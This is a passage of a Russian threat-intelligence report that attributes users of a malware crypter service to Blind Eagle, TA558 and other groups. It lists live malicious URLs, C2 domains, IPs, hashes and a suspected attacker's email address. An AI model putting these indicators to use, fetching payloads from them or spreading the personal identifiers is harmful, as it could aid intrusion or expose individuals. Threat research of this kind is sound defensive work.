В процессе исследования группировки Blind Eagle мы наткнулись на сервер 181.71.217.114, который принадлежит привычной для Blind Eagle ASN Colombia Movil (AS 27831). Из доменов, которые резолвились в этот IP большинство имели паттерн strekhostYYYY, например, strekhost2024[.]duckdns[.]org. Эти домены были атрибутированны к группировке Blind Eagle компанией Zscaler, судя по публично доступному репозиторию на GitHub.

Помимо этих доменов, были несколько других, а именно:

  • deadpoolstart2025.duckdns.org

  • deadpoolstart2026.duckdns.org

  • deadpoolstart2051.duckdns.org

Также на другом IP 179.14.11.213 можно найти ещё несколько версий deadpoolstart с разными годами, например - deadpoolstart2035.duckdns.org.

Оказалось, что в базе данных Crypters And Tools присутствует пользователь deadpoolstart2025.

Рисунок 32. Информация из базы данных о пользователе deadpoolstart2025
Рисунок 32. Информация из базы данных о пользователе deadpoolstart2025

Одна из атак его выглядела следующим образом.

14 ноября 2024 года злоумышленник отправил вредоносное письмо c поддельным отправителем в лице колумбийского производителя медицинских лекарств:

Рисунок 33. Письмо, отправленное злоумышленником
Рисунок 33. Письмо, отправленное злоумышленником

Ссылка вела на google drive, с которого скачивался запароленный архив “FOLIO_INCONSISTENCIA_REVISION_FISCAL_CARTERA_DETALLES_DETALLES_AMPLIADOS_CODIGO_VERIFICACION_ad851874148487ff17817ca2545434453154617ff5464484171525541748594ca6544981894ff11258749565284_XML.rar” (SHA-256: 5fe3f4e4ab026fbcd0b595c7b35eb3b3997cae0fc8b92728b0bd556a3ec3c092). Пароль от архива содержался в теле самого письма, а внутри находился VBS-файл (SHA-256: 937fcba2f15c795a209032a36a921fe9f53ea7a47e7295573cd1c0ebb8d9d241. В процессе запуска VBS прописывался в автозагрузку, а также загружал вредоносный скрипт с ресурса paste.ee.

Полученный с paste.ee скрипт содержит закодированную в base64 команду с уже привычной $Codigo. После запуска скрипт забирает данные через API с сервера Crypters And Tools – 1017.filemail.com, а также дополнительно обращается к files.catbox.moe. В итоге, запускался AsyncRAT c С2, который уже принадлежит самому злоумышленнику, а не криптору – deadpoolstart2025.duckdns.org (181.71.217.114).

Мы нашли множество атак, связанных с этим пользователем и большинство из них приходиться на период с ноября 2024 по февраль 2025. Во всех обнаруженных атаках злоумышленник использовал Asyncrat. Мы обратили внимание, что mutex asyncrat в этих атаках был довольно интересным:

  • zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzNUEVOHOSTMALDITASEA

С испанского “nuevo host maldita sea” переводится, как “новый хозяин, черт возьми”

Также в процессе исследования мы нашли сервер Crypters And Tools. Этот сервер использовался для взаимодействия с криптором через API. Один из пользователей, судя по найденному запросу – некий ABBAS:

http://91.92.254.29/Users_API/ABBAS/file_odpxh4oq.2bf.txtn

Если внимательно рассматривать цепочку атаки, то можно найти явные корреляции с атаками Blind Eagle, к примеру IP адреса 191.93.113.10 и 152.201.184.91, которые хостились на типичных для Blind Eagle колумбийских провайдерах. Помимо этого, сама атака коррелирует с недавним описанием Checkpoint.

Этот пользователь присутствовал во всех версиях баз данных, которые мы отслеживали в процессе исследования Crypters And Tools.

Рисунок 34.1 Информация из базы данных о пользователе ABBAS
Рисунок 34.1 Информация из базы данных о пользователе ABBAS
Рисунок 34.2 Информация из базы данных о пользователе ABBAS
Рисунок 34.2 Информация из базы данных о пользователе ABBAS

В результате можно сказать, что в отличие от bukky101, которого нельзя точно аттрибутировать к Aggah или TA558, атаки пользователей deadpoolstart2025 и ABBAS полностью соответствуют описанию Blind Eagle, включая язык, жертв, серверную инфраструктуру и т.д., поэтому в данном случае мы считаем, что deadpoolstart2025 и abbas являются членами Blind Eagle или напрямую сотрудничают с этой группой.

7.3 TA558: Brainiac, syscore и negrocock

Как мы показали в случае с пользователем ABBAS, некоторых пользователей Crypters And Tools мы обнаружили в процессе исследования отдельных активностей группировок Blind Eagle и TA558.

Были найдены два пользователя – BrainiacMax и syscore, которые взаимодействовали через API с инфраструктурой криптора:

В главе “Особенности группы TA558”  мы привели уникальные черты, которые позволяют идентифицировать группировку. В данном случае цепочка атаки BrainiacMax содержит классический пример ТА558 – хосты на AS-COLOCROSSING и уникальные названия:

Более того, данные отправляются на легальный взломанный хакерами SMTP сервер в Румынии, что является соответствует активности для TA558 и что мы видели начиная с первого нашего исследования про эту группу.

С пользователем syscore похожая история. В атаке использовался Excel документ с очень типичным для TA558 именем “Product Inquiry466789.xls” SHA-256: 3a7d034a793a0f03dc9930446aebf326320140584eeb171909962ec7123f9e5e, который загружал RTF шаблон со следующего URL:

  • http://51.81.235.253/66166/hd/hd.d.d.d.dddd.doC

Далее в цепочке атаки появлялся VBS с очень типичным для TA558 названием:

  • http://51.81.235.253/66166/catcallingfemalecattogiveflowersgreat.gif

Оба этих пользователя были найдены в базе данных Crypters And Tools:

Рисунок 35.1 Информация из базы данных о пользователе Brainiac
Рисунок 35.1 Информация из базы данных о пользователе Brainiac
Рисунок 35.2 Информация из базы данных о пользователе Syscore
Рисунок 35.2 Информация из базы данных о пользователе Syscore

Как и в случае с пользователями deadpoolstart2025 и abbas, мы можем быть уверены, что эти конкретные пользователи относятся к публично описанной группе, но в данном случае – это группа TA558.

Аналогичным образом был найден ещё один пользователь – negrocock:

  • http://94.156.65.247/Users_API/negrocock/file_mq5uppna.ldt.txt

Его атаки также содержали типичные для TA558 паттерны:

7.4 KareemHacker

В базе CryptersAndTools присутсвовал следующий пользователь:

Рисунок 36. Информация из базы данных о пользователе KareemHacker
Рисунок 36. Информация из базы данных о пользователе KareemHacker

KareemHacker – это хакер, предположительно из Марокко, который судя по данным сайта mirror-h (сайт, который собирает данные о дефейсах) был причастен к дефейсу, по крайней мере 538 сайтов, а по данным zone-h – 1671. Помимо этого, у него есть свой GitHub, X-аккаунт и несколько Youtube-каналов, на одном из которых он под музыку пишет текст на арабском языке и показывает сайты, которые он задефейсил. На данный момент его аккаунт в соцсети X заблокирован за нарушение правил, т.к. некоторые пользователи жаловались, что он взломал их вебсайт.

Рисунок 37. GitHub аккаунт Kareem Hacker
Рисунок 37. GitHub аккаунт Kareem Hacker

Стоит отметить, что Kareem Hacker это может быть редкое, но легальное сочетание имени и фамилии, а также, что мы не можем в данном случае быть уверены, что пользователь Crypters And Tools и дефейсер Kareem.Hacker это один человек.

7.5 HeadMaster

Во время исследования Crypters And Tools, мы исследовали различные маркетплейсы, сайты и прочие ресурсы с продажами этого криптора. Один из таких ресурсов это – nitrosoftwares[.]com, где продаются различные эксплойты, крипторы, логгеры, криптоклипперы и т.п.

Рисунок 38. Сайт с продажей различных ПО для хакеров
Рисунок 38. Сайт с продажей различных ПО для хакеров
Рисунок 39. Контакты на сайте
Рисунок 39. Контакты на сайте

В базе данных Crypters And Tools мы обнаружили следующего пользователя:

Рисунок 40. Информация из базы данных о пользователе headmaster
Рисунок 40. Информация из базы данных о пользователе headmaster

Обратите внимание на связь дискорд аккаунта headmaster и Email jkbest22@gmail.com (рис 39). В публичных утечках мы нашли пароли, связанные с этим email, один из которых совпадает с паролем пользователя headmaster на рисунке 40 (скрыт на рисунке).

То есть злоумышленник использовал однообразные пароли на многих почтовых ящиках и в различных сервисах, включая вышеупомянутый сайт с продажей вредоносного ПО. Помимо этого, часть многочисленных почтовых ящиков злоумышленника подверглись утечкам, которые включали емейлы, пароли, никнеймы, а также IP-адреса, все из которых были из Пакистана - предположительной страны происхождения группы Aggah. Тем не менее, установить однозначную связь между HeadMaster и Aggah пока не удалось.

7.6 Остальные пользователи

Очередной найденный пользователь – HURRICANE.

Рисунок 41. Информация из базы данных о пользователе HURRICANE
Рисунок 41. Информация из базы данных о пользователе HURRICANE

Этот пользователь, так же, как и многие другие был найден через API запросы к инфраструктуре CryptersAndTools, который он делал во время своих атак:

  • http://94.156.65.247/Users_API/HURRICANE/file_lfhsdrdp.5db.txt

Рисунок 42. Пример письма пользователя Crypters And Tools — HURRICANE
Рисунок 42. Пример письма пользователя Crypters And Tools — HURRICANE

Имена документов были похожи на используемые TA558, но дальнейшая цепочка атаки отличалась.

Помимо этого, мы видели ещё несколько URL-ов с пользователями, относящимися к Crypters And Tools, но пока не располагаем по ним дополнительными данными:

8. Выводы

Исследователи в своих отчётах часто указывают инфраструктуру Crypters And Tools, в качестве индикаторов описанных групп, но это не всегда правильно. В первой части нашего исследования мы показали устройство криптора, а также указали часть сетевых и файловых индикаторов, которые принадлежат Crypters And Tools. В этой части мы показали какие группы использовали этот криптор, а также их связи друг с другом.

Помимо этого, мы проанализировали некоторых активных пользователей криптора и точно установили, что часть пользователей является членами группировок Blind Eagle и TA558. А также обнаружили некоторых других пользователей, например Bukky101, который совместно с другим пользователем за сутки отправили как минимум 60300 вредоносных писем по всему миру.

Также рассмотренные новые атаки группировки Aggah показывают, что несмотря на затишье в 2022 году, их активность продолжается в 2024 и 2025 годах. Ключевые методы, такие как использование serverless-инфраструктуры (например, Blosgspot и Bitbucket), остаются неизменной частью цепочки заражения. Однако наряду с этим наблюдается появление новых вредоносных нагрузок, таких как Rhadamanthys и XWorm.

9. Список статей с упоминанием рассматриваемых группировок и криптора

Aggah

  1. https://malware.news/t/unknown-ttps-of-remcos-rat/80082

  2. https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/

  3. https://web.archive.org/web/20240106015245/https:/marcoramilli.com/2022/11/21/is-hagga-threat-actor-abusing-fsociety-framework/

  4. https://ti.qianxin.com/blog/articles/Subgroup-of-Blind-Eagle-Analysis-of-Recent-Attack-Activities-from-Hagga-Group-EN/

TA558

  1. https://www.metabaseq.com/threat/ta588/

  2. https://www.forcepoint.com/blog/x-labs/url-shortener-microsoft-word-remcos-rat-trojan

  3. https://cyble.com/blog/threat-actor-employs-powershell-backed-steganography-in-recent-spam-campaigns/

  4. https://www.seqrite.com/blog/steganographic-campaign-distributing-malware/

  5. https://www.trellix.com/blogs/research/unmasking-the-hidden-threat-inside-a-sophisticated-excel-based-attack-delivering-fileless-remcos-rat/

  6. https://www.cyfirma.com/research/exploiting-document-templates-stego-campaign-deploying-remcos-rat-and-agent-tesla/

Blind Eagle

  1. https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia

  2. https://www.esentire.com/blog/blind-eagles-north-american-journey

  3. https://mp.weixin.qq.com/s/DDCCjhBjUTa7Ia4Hggsa1A

  4. https://any.run/cybersecurity-blog/steganography-in-malware-attacks/

PhantomControl

  1. https://www.esentire.com/blog/phantomcontrol-returns-with-ande-loader-and-swaetrat

Статьи с фигурированием Crypters And Tools без атрибутирования к каким-либо группировкам

  • https://somedieyoungzz.github.io/posts/stego-camp/

  • https://asec.ahnlab.com/en/65111/

  • https://www.mcafee.com/blogs/other-blogs/mcafee-labs/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/

  • https://www.zscaler.com/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla

  • https://www.fortinet.com/blog/threat-research/python-info-stealer-malicious-excel-document

  • https://blog.itochuci.co.jp/entry/2024/04/16/163014

  • https://medium.com/@b.magnezi/malware-analysis-xworm-80b3bbb072fb


Александр Бадаев

Специалист группы киберразведки Positive Technologies

Елена Фурашова

Стажер группы киберразведки Positive Technologies

Теги:
Хабы:
+7
Комментарии0

Публикации

Информация

Сайт
www.ptsecurity.com
Дата регистрации
Дата основания
2002
Численность
1 001–5 000 человек
Местоположение
Россия